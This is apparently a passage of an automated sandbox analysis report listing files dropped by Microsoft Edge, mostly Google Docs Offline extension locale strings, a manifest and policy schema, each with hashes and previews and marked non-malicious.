                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1320
                                                                                                                                                                                                                                                                Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):884
                                                                                                                                                                                                                                                                Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):980
                                                                                                                                                                                                                                                                Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1941
                                                                                                                                                                                                                                                                Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1969
                                                                                                                                                                                                                                                                Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1674
                                                                                                                                                                                                                                                                Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1063
                                                                                                                                                                                                                                                                Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1333
                                                                                                                                                                                                                                                                Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1263
                                                                                                                                                                                                                                                                Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1074
                                                                                                                                                                                                                                                                Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):879
                                                                                                                                                                                                                                                                Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1205
                                                                                                                                                                                                                                                                Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):843
                                                                                                                                                                                                                                                                Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):912
                                                                                                                                                                                                                                                                Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):11406
                                                                                                                                                                                                                                                                Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):854
                                                                                                                                                                                                                                                                Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2525
                                                                                                                                                                                                                                                                Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):97
                                                                                                                                                                                                                                                                Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):122218
                                                                                                                                                                                                                                                                Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):291
                                                                                                                                                                                                                                                                Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):130866
                                                                                                                                                                                                                                                                Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                Encrypted:false
